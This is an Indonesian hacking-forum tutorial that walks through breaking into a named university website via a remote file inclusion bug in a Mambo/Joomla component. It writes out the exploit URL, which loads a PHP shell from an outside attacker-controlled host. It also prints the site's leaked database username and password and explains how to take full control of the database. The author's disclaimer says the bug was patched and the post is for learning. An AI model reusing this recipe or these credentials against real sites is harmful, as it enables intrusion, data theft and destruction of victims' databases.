|
|
|
|
Online Now: 3 0 Members | 3 Guests |
|
|
|
|
|
|
Copy & paste Coding Dibawah ini Untuk Banner kami ================================== <a href="http://www.sekuritionline.net/" target="_blank"><img src= "http://www.sekuritionline.net/ banner/banner.gif" width="125" height="75" alt="sekuritionline.net" title="SO-Te@m" border="0" /></a> |
|
|
|
|
|
|
| -------------------------------- |
|
|
|
|
|
|
|
| January 26, 2009, 6:28 pm |
|
|
|
|
By cyberlog
Published: April 28, 2007
Print
Email
Bila anda sering melakukan deface hal semacam ini mungkin biasa, jadi mohon maaf bila tulisan ini tidak tepat bagi seorang Defaceman mania. Penulis
akan menerangkan untuk melihat suatu database dapat dilakukan lewat
Shell Injection, tidak selalu harus melihat memakai Phpmyadmin, Disini
anda diharuskan mencari target terlebih dahulu, baru kemudian mencari
tahu kelemahan / Bug yang terdapat dalam target tersebut
Ok
langsung aja , terserah anda mau memakai bantuan Google Uncle, Bostscan
IRC, or Tool lainnya, anggap saja target telah anda dapatkan, disini
penulis ambil contoh yaitu www.univpancasila.ac.id [Pancasila merupakan Universitas ternama di Jakarta ]. Langkah pertama adalah menganalisa web tersebut dengan jalan memberikan inputan ke dalam browsing, www.univpancasila.ac.id/administrator Maka akan tampil tampilan seperti dibawah ini :

Kita bisa melihat bahwa situs kampus pancasila menggunakan Open Source Php Mambo / Jomla setelah itu anda dapat mencari Bug / Kelemahan Mambo Php di Situs-situs Underground Seperti milw0rm, security focus, Dll Disini didapatkan suatu Bug yang ada yaitu com_facileforms, Kemudian kita bisa ambil Vulnerable / Bug yang ada yaitucom_facileforms/facileforms.frame.php?ff_compath=
Nah sekarang saatnya untuk kita coba linkan dari phpshell kita ketempat bug yang bermasalah, untuk linknya adalah http://www.univpancasila.ac.id/components/com_facileforms/facileforms.frame.php?ff_compath= http://cyberlog.t35.com/tool/inject.txt? Maka akan didapat tampilan seperti dibawah ini :

Ternyata
kita masuk lewat dari Shell Php kita, setelah itu kita harus mencari
tahu user, pass, name database target, Disini secara default informasi
tersebut berada di file Config.php atau Configuration.php yang ada di
Halaman Root target. Neh Halaman Untuk mencari File Config.php :

Ups
dapat kita lihat disitu ada file Configuration.php, lihat apakah ada
informasi untuk masuk kedalam databse tersebut, buka file
Configuration.php dan akan nampak hasil yang ada [
untuk hal ini sama sewaktu Penulis melakukan injection kedalam Situs
Bsi.ac.id dan melihat Config.php untuk masuk kedalam databse tersebut ] dimana file configuration.php merupakan link untuk masuk ke dalam database situs tersebut.

Nah kita perhatikan didalam file configuration.php ada beberapa hal penting, yaitu :Host : LocalhostUser : RootPass : L0nt0ngk4r1Database : pancasila1===============================Untuk
masuk kedalam database situs pancasila cukup mudah kita tidak usah
repot-repot mencari File databasenya cukup dengan mengklik SQL yang ada disamping Php-code, akan nampak hasil seperti dibawah ini :
 Masukkan Username, password, database di Sql Manager, klik Connect, maka akan tampil halaman database Pancasila

Ups
ternyata cukup mudah untuk masuk kedalam database situs tanpa kita
harus tahu letak dari database tersebut dan anda dapat melakukan
control penuh terhadap databse tersebut. [ ga bisa dibayangkan bila ada
orang yang berniat jelek , bisa2 database di delete or dirubah ] Semoga
jangan sampai terjadi
Note : -
Untuk Bug yang ada di situs www.univpancasila.ac.id telah berhasil ditutup -
Kami hanya melakukan penetrasi, tidak merusak atau merubah database pancasila -
Untuk
Admin harap melakukan update pacth secara continue agar terhindar dari
serangan injection [ maklum mambo banyak bug yang bermasalah ]. -
Tulisan
ini murni sebagai pembelajaran untuk kami, anda, dan semua bahwa tidak
selamanya system yang dibangun secara Online aman. -
Untuk para newbie mohon untuk tidak merusak bila anda berhasil masuk Kedalam target, jadikan bahwa ‘ Hacking is Art ‘ dan bantu admin untuk melakukan patching/menutup bug yang ada. Special for : Yayang Erni [ moga cepat sembuh ]
View Comments (0)
|
|
|
|
|
Sorry, your account does not have access to post comments.